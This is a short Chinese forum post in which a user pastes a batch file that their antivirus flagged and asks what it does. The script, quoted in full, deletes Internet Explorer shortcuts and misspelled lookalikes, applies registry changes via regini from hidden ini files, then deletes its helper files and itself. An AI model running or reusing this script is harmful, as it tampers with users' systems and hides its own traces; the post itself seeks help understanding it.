拳拳打面 拳拳打面
关注数: 246 粉丝数: 233 发帖数: 7,501 关注贴吧数: 12
求高手看看这些代码是什么意思。 无意间在电脑里面扫描出了一个病毒。是批处理格式。我把改成了txt格式。文本内容如下 @echo off @del "%USERPROFILE%\Application Data\Microsoft\Internet Explorer\Quick Launch\启动 Internet Explorer 浏览器.lnk" /f @del "%USERPROFILE%\Application Data\Microsoft\Internet Explorer\Quick Launch\启动 IE 浏览器.lnk" /f @del "%USERPROFILE%\Application Data\Microsoft\Internet Explorer\Quick Launch\Internet Explorer.lnk" /f @del "%USERPROFILE%\Application Data\Microsoft\Internet Explorer\Quick Launch\Intenert Explorer.url" /f @del "%USERPROFILE%\Application Data\Microsoft\Internet Explorer\Quick Launch\Intenert Expleror.url" /f @del "%USERPROFILE%\Application Data\Microsoft\Internet Explorer\Quick Launch\Internet Expleror.lnk" /f @del "%userprofile%\桌面\启动 Internet Explorer 浏览器.lnk" /f @del "%userprofile%\桌面\Internet Explorer.lnk" /f @del "%userprofile%\桌面\Internet Explorer.url" /f @del "%userprofile%\桌面\Internet Expleror.lnk" /f @del "%userprofile%\桌面\Internet Expleror.url" /f @del "%ALLUSERSPROFILE%\桌面\Intenert Expleror.url" /f @del "%ALLUSERSPROFILE%\桌面\Internet Explorer.lnk" /f @del "%ALLUSERSPROFILE%\桌面\Intenert Expleror.url" /f @del "%ALLUSERSPROFILE%\桌面\Internet Expleror.lnk" /f @del "%ALLUSERSPROFILE%\桌面\启动 Internet Explorer 浏览器.lnk" /f @regini %windir%\system32\regtest5.ini @regini %windir%\system32\regtest6.ini @del "start.vbs" /f @del "run.vbs" /f @del "%windir%\system32\regtest5.ini" /f @del "%windir%\system32\regtest6.ini" /f @del %0 /f @exit
1 下一页